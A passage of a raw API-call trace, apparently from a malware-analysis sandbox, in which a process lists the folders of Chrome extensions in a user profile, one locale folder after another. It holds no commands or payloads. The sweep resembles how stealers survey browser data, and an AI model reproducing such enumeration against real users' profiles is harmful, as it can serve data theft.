HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.935] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.935] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_PT\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.936] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.936] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.936] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.936] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.937] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.937] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0149.937] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0149.938] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0149.938] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32c28 [0150.041] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0150.041] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0150.041] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32c28 [0150.041] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0150.041] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0150.041] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0150.163] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0150.163] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0150.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0150.163] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0150.163] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0150.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0150.165] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0150.166] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0150.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0150.166] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0150.166] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0150.166] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0150.252] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0150.253] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0150.253] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0150.253] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0150.253] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0150.253] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0150.303] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0150.303] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0150.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0150.494] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0150.494] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0150.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0151.065] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0151.065] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0151.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0151.137] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0151.137] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0151.137] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0151.174] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0151.174] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0151.174] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0151.174] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0151.175] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0151.175] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0151.211] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0151.212] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0151.212] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0151.212] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0151.212] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0151.212] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0151.212] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0151.212] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32968 [0151.245] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0151.245] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0151.246] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0151.246] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0151.246] FindClose (in: hFindFile=0xa32ce8 | out: hFindFile=0xa32ce8) returned 1 [0151.246] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0151.247] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32ce8 [0151.248] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\*", lpFindFileData=0x2b4dd4c | out: lpFindFileData=0x2b4dd4c) returned 0xa32da8 [0151.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\css\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa327e8 [0152.027] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0152.027] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0152.027] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa327e8 [0152.028] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0152.028] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0152.028] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32c28 [0152.312] FindClose (in: hFindFile=0xa32c28 | out: hFindFile=0xa32c28) returned 1 [0152.313] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0152.313] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32c28 [0153.263] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.263] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.263] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.263] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.341] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.341] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.341] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.341] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0153.352] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0153.352] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0153.352] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0153.353] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.353] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0153.355] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0153.356] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.356] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0153.356] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0153.356] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.356] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en_GB\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0153.363] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0153.363] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.363] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0153.363] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0153.364] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.364] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.367] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.367] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.368] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.368] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.369] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.369] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.369] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.370] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.370] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.371] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.371] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.371] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.371] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.371] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.371] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.372] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.373] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.373] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.373] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.373] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.373] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.374] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.374] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.374] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.374] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.375] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.375] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.376] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.376] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.376] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.376] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d28 [0153.377] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0153.377] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0153.377] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\*", 